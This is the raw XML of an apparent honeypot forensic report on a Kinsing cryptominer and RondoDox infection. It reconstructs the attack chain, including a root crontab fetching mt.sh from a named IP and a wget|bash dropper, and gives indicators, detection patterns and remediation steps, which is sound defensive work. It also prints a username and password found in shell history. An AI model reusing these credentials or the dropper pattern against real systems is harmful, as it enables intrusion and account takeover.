        <w:t xml:space="preserve">Symbol extraction from the Kinsing binary revealed the following internal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Symbol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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main.Task / main.TaskPair</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Task-based C2 command processing system</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main.Kill</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Process termination (kills competing miners)</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main.MinerUrl / []main.MinerUrl</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Configurable mining pool URLs (multiple pool failover)</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main.ProcStat / []main.ProcStat</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Process monitoring and system stats reporting</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main.SetSocks</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SOCKS5 proxy configuration for traffic tunneling</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main.Specification</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Runtime configuration specification</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main.TargetsWrapper</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Target enumeration for scanning/exploitation</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main.ExecOutput</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Command execution with output capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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CommandWithContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BFDBFE" w:sz="1"/>
              <w:left w:val="single" w:color="BFDBFE" w:sz="1"/>
              <w:bottom w:val="single" w:color="BFDBFE" w:sz="1"/>
              <w:right w:val="single" w:color="BFDBFE" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Context-aware command execution (timeouts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">socks5.PermitCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="688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20"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SOCKS5 proxy command filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 — Kinsing Attack Chain (Reconstructed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial access likely via Apache Guacamole RCE vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing binary downloaded to /etc/data/kinsing and executed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing establishes C2 listener on port 31190</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Root crontab modified to download mt.sh from 80.64.16.241 every minute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kdevtmpfsi (XMRig miner) deployed to /tmp/kdevtmpfsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Miner connects to pool at 185.221.152.130:443 for Monero mining</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup copies created (.bak) for automatic recovery if primary files deleted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fileless dropper (wget|bash) ensures reinfection even after partial cleanup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9 — Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 — Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete server wipe as planned — the root crontab and binary backup system make partial remediation unreliable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Block all identified C2 IPs at the perimeter firewall: 45.92.1.50, 80.64.16.241, 185.221.152.130</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Block the SSH brute-force source IPs: 175.196.135.148, 2.57.122.0/24, 2.57.121.0/24, 45.148.10.0/24, 91.202.233.0/24, 176.120.22.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate ALL credentials that were on this server, including the RDP credentials visible in shell history (OMercer / gothicy123!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all SSL certificates and private keys that were on this host — they should be considered compromised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit all SHA256 hashes to VirusTotal and any threat intelligence sharing platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 — Rebuild Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Apache Guacamole to latest version before redeploying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not expose Guacamole directly to the internet — place behind a VPN or zero-trust gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement fail2ban or equivalent for SSH brute-force protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy EDR/XDR with Kinsing and cryptominer detection rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Harden cron: restrict crontab access, monitor for unauthorized changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never use chmod 777 on sensitive directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 — Detection Rules for Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP requests to 80.64.16.241/mt.sh (Kinsing dropper)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound connections to 185.221.152.130:443 (mining pool)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Process names: kdevtmpfsi, kinsing, softirq.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Files in /etc/data/ (non-standard path used by Kinsing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Crontab entries containing wget|bash or curl|bash patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Processes listening on port 31190</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH version string SSH-2.0-MoTTY_Release_0.82 (RondoDox)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Server header containing 'rondo'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFDBFE" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A — Collection Methodology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0"/>
        <w:gridCol w:w="6960"/>
      </w:tblGrid>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Collection tool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Python 3 + Paramiko (SSH/SFTP)</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Phases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7 (live state, persistence, binaries, network, logs, deep hunt, filesystem)</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Operations logged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89 total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Collection time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March 24, 2026 12:34-12:48 UTC-7</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Server hostname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agricultureintech</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Server OS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Ubuntu (based on dpkg/apt presence)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Analysis host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macOS Darwin 25.3.0</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Access method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SSH as ait, sudo escalation to root</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F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Binary handling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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All malware defanged (.DEFANGED) and zipped with password 'infected'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B — Related Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RondoDox_Analysis.docx — Full static analysis of the RondoDox binary including encryption scheme, DDoS capabilities, persistence mechanisms, and anti-analysis evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">malware_samples_INFECTED.zip — All collected malware binaries (password: infected, .DEFANGED extensions)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="20" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">evidence/ — Complete forensic evidence directory with all collected artifacts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1"/>
      </w:pBdr>
      <w:spacing w:after="0" w:before="80"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="9CA3AF"/>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BFE" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="80" w:before="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Honeypot Forensic Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="9CA3AF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   CONFIDENTIAL   |   March 24,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5F"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="280"/>
      <w:outlineLvl w:val="1"/>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2026-03-24T19:51:40.348Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T19:51:40.355Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>